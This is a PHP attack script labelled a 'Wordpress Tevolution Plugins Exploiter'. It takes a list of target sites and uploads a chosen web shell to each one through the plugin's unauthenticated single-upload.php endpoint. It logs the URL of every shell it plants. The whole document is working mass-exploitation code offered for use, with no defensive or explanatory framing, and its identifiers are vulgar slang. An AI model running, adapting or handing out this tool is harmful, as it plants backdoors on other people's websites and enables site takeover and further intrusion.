<?php
print"
Wordpress Tevolution Plugins Exploiter
by Synchronizer - Stupidc0de Family
";
error_reporting(0);
set_time_limit(0);
if(!file_exists($argv[1])){
die('
File Not Found
usage: php tev.php list.txt
');
}
$xnxx=@fopen('logs.html','a+');
$get=file_get_contents($argv[1]);
$ex=explode("\n",$get);
$c=file($argv[1]);
echo"Total target : ".count($c)."\n\n";
foreach($c as $site){
echo "xploit site : $site";
$site=trim($site);
$kontolmu = 'shell.php'; # CHANGE YOUR SHELL HERE BRO
$isep = '/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php';
echo kirim_jembut($site,$kontolmu,$isep);
}
function cukur_abis($jembut) {
$jembut = str_replace('["','',$jembut);
$jembut = str_replace('"]','',$jembut);
return $jembut;
}
function tarik_jembut($listjembut) {
$pangkas=explode("\r\n",$listjembut);
return $pangkas;
}
function kirim_jembut($alamat_janda, $memeknya, $jilat) {
$file = realpath($memeknya);
$ch = curl_init($alamat_janda.$jilat);
curl_setopt($ch, CURLOPT_POST, 1);
$stupidc0de['jembutfile'] = new CurlFile($file, 'text/html');
curl_setopt($ch, CURLOPT_POSTFIELDS, $stupidc0de);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$respon_janda = curl_exec($ch);
curl_close ($ch);
if(preg_match('/'.$memeknya.'/',$respon_janda)){
$hasil = ''.cukur_abis($respon_janda).'';
$def = "SUCCESS";
$xnxx=@fopen('logs.html','a+');
fwrite($xnxx,"$alamat_janda/wp-content/themes/Directory/images/tmp/$hasil"."<br>");
}
else {
$hasil = 'NULL';
$def = "FAILED";
}
echo" Status = $def \n Shell = $hasil\n";
}
print "
result saved in logs.html
";
?>